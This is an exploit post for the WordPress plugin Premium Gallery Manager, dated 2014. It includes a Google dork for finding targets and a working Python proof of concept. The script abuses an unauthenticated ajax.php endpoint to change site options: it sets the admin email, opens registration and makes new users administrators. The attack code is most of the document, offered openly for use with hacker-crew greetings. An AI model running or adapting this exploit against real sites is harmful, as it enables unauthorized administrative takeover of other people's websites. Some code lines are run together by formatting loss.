#Exploit Title : WordPress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability#Author : Hannaichi [@dntkun]#Date : February 5th, 2014#Type : php, html, htm, asp, etc.#Category : Web Applications#Vulnerability : Unauthenticated Configuration Access#Tested On : Windows 7 32-bit | Google Chrome #Dork : inurl:/wp-content/plugins/premium_gallery_manager/ | USE YOUR BRAIN =))#Exploit : http://victim/[PATH]/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php#POC :
Save File As Python (.py)=import httplib, urllib
#target site
site ="victim"#<--- no http:// or https://#path to ajax.php
url ="/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php"defChangeOption(site, url, option_name, option_value):
params = urllib.urlencode({'action':'save','values[0][name]': option_name,'values[0][value]': option_value})
headers ={"Content-type":"application/x-www-form-urlencoded","Accept":"text/plain"}
conn = httplib.HTTPConnection(site)
conn.request("POST", url, params, headers)
response = conn.getresponse()print response.status, response.reason
data = response.read()print data
conn.close()
ChangeOption(site, url,"admin_email","youremail@test.com")
ChangeOption(site, url,"users_can_register","1")
ChangeOption(site, url,"default_role","administrator")print"Now register a new user, they are an administrator by default!"#Place It Broo No Lazy For This :D !!--------------------------------------------------------------------------------------------------------------------
Thanks to:#AnonSec Hackers - Borneo Security - Bekantan Crew - Indonesian Hacker - Muslim Hacker - You :*
